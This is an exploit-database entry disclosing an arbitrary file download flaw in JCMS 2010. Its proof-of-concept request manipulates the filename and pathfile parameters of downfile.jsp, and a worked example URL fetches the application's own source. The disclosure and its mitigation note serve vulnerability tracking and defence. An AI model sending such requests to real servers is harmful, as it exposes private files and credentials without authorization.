header-logo
Suggest Exploit
vendor:
JCMS 2010
by:
Beach
7,5
CVSS
HIGH
File Download Vulnerability
22
CWE
Product Name: JCMS 2010
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Java
2010

JCMS 2010 File Download Vulnerability

In /module/download/downfile.jsp ,filename and pathfile didn't verify user's input, allowing an attacker to download any files.

Mitigation:

Input validation should be done to verify user's input.
Source

Exploit-DB raw data:

#####################################################################################################
#Title:   JCMS 2010 File Download Vulnerability
#Date:    2010-11-22
#Author:  Beach
#Team:    http://www.linux520.com/
#Vendor:  http://www.hanweb.com/
#Language:Java
#Greetz:  Brother
#####################################################################################################
[*]Description:

In /module/download/downfile.jsp ,filename and pathfile didn't verify user's input 
So this vulnerability allows an attacker to download any files .
#####################################################################################################
[*]POC:

http://server/module/download/downfile.jsp?filename=[file_name]&pathfile=[Path/Path/file_name]
#####################################################################################################
[*]I.E:

http://server/module/download/downfile.jsp?filename=downfile.jsp&pathfile=module/download/downfile.jsp
#####################################################################################################